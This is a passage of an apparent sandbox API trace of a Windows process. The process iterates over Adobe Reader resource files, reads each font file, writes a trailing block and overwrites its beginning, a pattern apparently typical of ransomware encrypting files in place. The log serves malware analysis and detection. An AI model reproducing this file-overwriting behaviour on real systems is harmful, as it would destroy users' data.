lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.623] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.623] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.623] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.623] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.624] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.624] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-ucs2")) returned 0x20 [0084.624] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ext-rksj-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.626] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-H", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-H", lpFilePart=0x2b1f690*="Ext-RKSJ-H") returned 0x41 [0084.626] GetLastError () returned 0x5 [0084.626] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.626] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.626] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.626] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.627] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.627] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.627] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ext-rksj-h")) returned 0x20 [0084.628] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk2k-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.629] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-V", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-V", lpFilePart=0x2b1f690*="GBK2K-V") returned 0x3e [0084.629] GetLastError () returned 0x5 [0084.629] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.629] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.629] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.629] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.630] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.630] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.630] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk2k-v")) returned 0x20 [0084.631] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbt-euc-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.631] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-V", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-V", lpFilePart=0x2b1f690*="GBT-EUC-V") returned 0x40 [0084.632] GetLastError () returned 0x5 [0084.632] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.632] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.632] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.632] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.632] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.633] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.633] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbt-euc-v")) returned 0x20 [0084.633] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.634] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-H", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-H", lpFilePart=0x2b1f690*="HKm314-B5-H") returned 0x42 [0084.634] GetLastError () returned 0x5 [0084.634] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.635] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.635] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.635] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.635] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.635] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.636] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-h")) returned 0x20 [0084.636] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ksc-euc-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.636] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-H", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-H", lpFilePart=0x2b1f690*="KSC-EUC-H") returned 0x40 [0084.636] GetLastError () returned 0x5 [0084.636] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.636] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.636] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.637] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.637] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.637] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.637] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ksc-euc-h")) returned 0x20 [0084.638] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.639] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2", lpFilePart=0x2b1f690*="KSCpc-EUC-UCS2") returned 0x45 [0084.639] GetLastError () returned 0x5 [0084.639] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.639] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.639] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.639] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.639] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.640] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.640] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-ucs2")) returned 0x20 [0084.644] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCms-UHC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-kscms-uhc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.645] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCms-UHC", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCms-UHC", lpFilePart=0x2b1f690*="UCS2-KSCms-UHC") returned 0x45 [0084.645] GetLastError () returned 0x5 [0084.645] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.645] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.645] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.645] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.645] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.646] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.646] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCms-UHC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-kscms-uhc")) returned 0x20 [0084.646] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-utf16-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.243] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-H", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-H", lpFilePart=0x2b1f690*="UniGB-UTF16-H") returned 0x44 [0085.244] GetLastError () returned 0x5 [0085.244] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0085.252] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.252] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.252] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0085.252] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0085.252] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0085.253] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-utf16-h")) returned 0x20 [0085.253] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis2004-utf16-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.253] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-H", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-H", lpFilePart=0x2b1f690*="UniJIS2004-UTF16-H") returned 0x49 [0085.253] GetLastError () returned 0x5 [0085.253] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0085.253] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.253] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.253] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0085.253] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0085.254] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0085.254] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis2004-utf16-h")) returned 0x20 [0085.254] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-BoldItalic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bolditalic.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.310] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.322] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3d9a0 [0085.322] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.327] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.334] ReleaseMutex (hMutex=0x168) returned 1 [0085.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeArabic-BoldItalic.otf", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0085.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeArabic-BoldItalic.otf", cchWideChar=26, lpMultiByteStr=0x1f8fc3c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeArabic-BoldItalic.otf", lpUsedDefaultChar=0x0) returned 26 [0085.342] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.348] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3c9a0 [0085.348] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.349] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3c9a0 [0085.350] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.350] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0085.350] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.351] CloseHandle (hObject=0x1fc) returned 1 [0085.351] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bold.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.352] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.352] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x10658 [0085.352] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.352] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.352] ReleaseMutex (hMutex=0x168) returned 1 [0085.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeThai-Bold.otf", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0085.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeThai-Bold.otf", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeThai-Bold.otf", lpUsedDefaultChar=0x0) returned 18 [0085.353] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.355] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xf658 [0085.355] ReadFile (in: hFile=0x1fc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.356] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xf658 [0085.357] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.357] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0085.357] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.357] CloseHandle (hObject=0x1fc) returned 1 [0085.358] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-bold.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.358] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.359] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x38600 [0085.359] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.359] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.359] ReleaseMutex (hMutex=0x168) returned 1 [0085.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MinionPro-Bold.otf", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0085.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MinionPro-Bold.otf", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MinionPro-Bold.otf", lpUsedDefaultChar=0x0) returned 18 [0085.359] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, 